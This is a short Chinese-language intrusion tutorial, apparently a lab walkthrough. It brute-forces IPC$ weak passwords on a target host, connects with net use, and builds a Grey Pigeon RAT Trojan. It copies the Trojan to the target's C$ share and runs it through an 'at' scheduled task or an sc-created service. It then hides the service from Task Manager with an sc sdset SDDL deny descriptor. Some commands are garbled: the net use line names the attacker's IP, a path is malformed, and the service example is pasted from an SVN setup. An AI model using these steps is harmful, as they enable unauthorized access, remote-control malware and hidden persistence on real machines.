IPC远程命令

我们首先来扫描目标主机是否存在IPC弱口令（PS：废话，靶机肯定存在了）

命令行下ping靶机IP：10.1.1.2，确认靶机存在。

爆破成功后，与目标主机建立IPC net use \\攻击方IP\ipc$ 密码 /user:用户名 用户名密码就是上面暴力破解的。

下一步：制作木马
使用：灰鸽子制作木马，将木马生成在D盘。

下一步：植入木马到目标主机
copy d:server.exe \被攻击方IP\c$\ 建议拷到对方C盘，成功率100%

设置目标主机运行木马（再目标主机中添加计划）
net time \10.1.1.2
at \10.1.1.2 17:17 c:\server.exe

或者通过服务运行

sc create SVNService(服务名) binpath= “J:\Subversion\bin\svnserve.exe(server程序路径) —service -r J:\SVNRep(仓库路径)” start= auto(启动方式) depend= Tcpip(协议)

& $env:SystemRoot\System32\sc.exe sdset mrxn  "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

运行成功后，在我们的任务管理器里面就看不到创建的 secvery 服务了（需要重启任务管理器或者你命令刷新）

如果你不想隐藏此windows服务了，运行以下安全描述符定义语言(SDDL)命令来取消隐藏即可：

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"